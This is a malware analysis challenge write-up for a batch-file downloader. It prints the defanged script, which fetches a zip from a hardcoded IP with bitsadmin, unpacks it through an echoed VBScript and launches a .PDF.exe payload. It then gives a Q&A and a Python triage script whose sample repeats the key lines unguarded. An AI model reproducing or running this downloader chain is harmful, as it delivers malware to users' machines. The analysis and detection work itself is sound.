Batch Downloader
Let's Defend Malware Analysis [Easy]


#tutorial

Challenge Description

(The challenge description is shown as an image on the original page.)

Solution and Analysis

Extract the batch file from the password-protected archive. The defanged code is shown below (the URL is defanged, and the lines that would execute the payload, run the dropped VBScript or delete the script have been commented out with REM):

@echo off
REM -- The following line is the downloader component. The URL has been defanged. --
bitsadmin /transfer System /Download /Priority FOREGROUND hxxp://193[.]169[.]255[.]78/FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip %TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip

setlocal
cd /d %~dp0

REM -- Calls the subroutine to unpack the downloaded payload. --
Call :UnZipFile "%TEMP%" "%TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip"

cd /d "%TEMP%"

REM -- The following line executes the payload. It has been commented out to prevent execution. --
REM start "" "FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.exe"

REM -- The following line is the self-deletion/cleanup mechanism. It has been commented out. --
REM del %~s0 /q

GOTO :EOF

:UnZipFile <ExtractTo> <newzipfile>
set vbs="%TEMP%\_.vbs"
if exist %vbs% del /f /q %vbs%
>%vbs%  echo Set fso = CreateObject("Scripting.FileSystemObject")
>>%vbs% echo If NOT fso.FolderExists(%1) Then
>>%vbs% echo fso.CreateFolder(%1)
>>%vbs% echo End If
>>%vbs% echo set objShell = CreateObject("Shell.Application")
>>%vbs% echo set FilesInZip=objShell.NameSpace(%2).items
>>%vbs% echo objShell.NameSpace(%1).CopyHere(FilesInZip)
>>%vbs% echo Set fso = Nothing
>>%vbs% echo Set objShell = Nothing

REM -- The following line runs the VBScript to unzip the file. It has been commented out. --
REM cscript //nologo %vbs%

if exist %vbs% del /f /q %vbs%
GOTO :EOF

Static Analysis Q&A

  1. Question 1: What command is used to prevent the command echoing in the console?

    • Answer: @echo off
    • Explanation: This is a standard command at the beginning of a batch script used for stealth and cleanliness. echo off prevents subsequent commands from being printed to the console as they are executed. The @ symbol preceding it prevents the echo off command itself from being displayed. This ensures the script runs without revealing its actions to the user.
  2. Question 2: Which tool is used to download a file from a specified URL in the script?

    • Answer: bitsadmin
    • Explanation: The script uses bitsadmin.exe, the Background Intelligent Transfer Service command-line tool. This is a legitimate Windows utility that malware authors frequently abuse to download malicious payloads. Using built-in system tools like this is a "Living Off the Land" (LOLBin) technique, which helps the malware avoid detection as it's using a trusted Microsoft-signed executable.
  3. Question 3: What is the priority set for the download operation in the script?

    • Answer: FOREGROUND
    • Explanation: The /Priority FOREGROUND switch tells the BITS service to give the download job a high priority. This ensures the malicious file is downloaded as quickly as possible, minimizing the time between initial execution and payload delivery.
  4. Question 4: Which command is used to start localization of environment changes in the script?

    • Answer: setlocal
    • Explanation: The setlocal command creates a local scope for environment variables. Any changes made to the environment after this command (like changing the current directory with cd) will be discarded when the script ends. This is a way for the script to clean up after itself and not leave lasting changes in the user's command shell environment.
  5. Question 5: Which IP address is used by malicious code?

    • Answer: 193.169.255.78
    • Explanation: This IP address is the hardcoded location of the command and control (C2) or staging server. The script reaches out to this address via HTTP to download the next-stage payload, which is the ZIP archive.
  6. Question 6: What is the name of the subroutine called to extract the contents of the zip file?

    • Answer: unzipfile
    • Explanation: The line Call :UnZipFile invokes a subroutine defined later in the script with the label :UnZipFile. Batch script labels are case-insensitive, so unzipfile is the correct name. This modular approach keeps the unpacking logic separate from the main execution flow.
  7. Question 7: Which command attempts to start an executable file extracted from the zip file?

    • Answer: start "" "FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.exe"
    • Explanation: The start command is used to run a program or open a file. In this case, it executes the payload FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.exe that was just extracted from the ZIP archive. The filename is designed to be deceptive, using a .PDF.exe double extension to trick users into thinking it's a harmless document.
  8. Question 8: Which scripting language is used to extract the contents of the zip file?

    • Answer: VBScript
    • Explanation: The batch script does not contain a native unzip command. Instead, the :UnZipFile subroutine dynamically creates a VBScript file (_.vbs) by echoing text into it. This VBScript code uses the built-in Shell.Application COM object, which has the functionality to handle ZIP archives. The batch script then executes this temporary VBScript using cscript.exe to perform the extraction.
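As an added example (not part of the walkthrough or the challenge files), the following Python triage script applies the observations above to a batch file: it skips REM and :: comments, flags the bitsadmin download, the .PDF.exe double extension, the echoed VBScript drop, the cscript execution and the self-deletion, and reports the URL and host in defanged form. The SAMPLE input is constructed from the script's key lines with the REM guards removed; the rule names and the scoring are my own.

```python
"""Static triage of a batch downloader: flags the techniques this walkthrough
describes and defangs the indicators found. Added example, not challenge code."""
import re

# Constructed sample: the key lines of the walkthrough's script, REM guards removed.
SAMPLE = r"""@echo off
bitsadmin /transfer System /Download /Priority FOREGROUND hxxp://193[.]169[.]255[.]78/FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip %TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip
Call :UnZipFile "%TEMP%" "%TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip"
start "" "FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.exe"
del %~s0 /q
:UnZipFile <ExtractTo> <newzipfile>
>>%vbs% echo set objShell = CreateObject("Shell.Application")
cscript //nologo %vbs%
"""

# Detection rules, in reporting order. URL patterns accept fanged and defanged forms.
RULES = [
    ("lolbin_download", re.compile(r"^\s*(bitsadmin|certutil|curl)\b.*h(?:tt|xx)ps?://", re.I | re.M)),
    ("double_extension", re.compile(r"\.(pdf|docx?|xlsx?|jpg|txt)\.(exe|scr|com|bat)\b", re.I)),
    ("dropped_script", re.compile(r">>?\s*%\w+%\s+echo\b.*CreateObject", re.I)),
    ("script_host_exec", re.compile(r"^\s*(cscript|wscript)\b", re.I | re.M)),
    ("self_delete", re.compile(r"\bdel\b.*%~s?0\b", re.I)),
    ("echo_off", re.compile(r"^\s*@echo\s+off\b", re.I | re.M)),
]
URL_RE = re.compile(r"h(?:tt|xx)ps?://[^\s\"']+", re.I)

def refang(url):
    """Normalise a possibly defanged URL so indicators compare equal."""
    return re.sub(r"^hxxp", "http", url.replace("[.]", "."), flags=re.I)

def defang(url):
    """Defang for safe reporting: hxxp scheme, [.] in the host part only."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.replace("tt", "xx") + "://" + host.replace(".", "[.]") + sep + path

def triage(text):
    """Return matched techniques and defanged URLs/hosts; REM and :: comments are skipped."""
    active = "\n".join(l for l in text.splitlines() if not re.match(r"\s*@?(rem\b|::)", l, re.I))
    hits = [name for name, rx in RULES if rx.search(active)]
    urls = sorted({defang(refang(u)) for u in URL_RE.findall(active)})
    hosts = sorted({u.split("://", 1)[1].split("/", 1)[0] for u in urls})
    return {"techniques": hits, "urls": urls, "hosts": hosts, "score": len(hits)}

if __name__ == "__main__":
    for k, v in triage(SAMPLE).items():
        print(f"{k}: {v}")
```

Because commented-out lines are ignored, running it over the defanged copy above (with its REM guards still in place) reports fewer techniques than the live sample does.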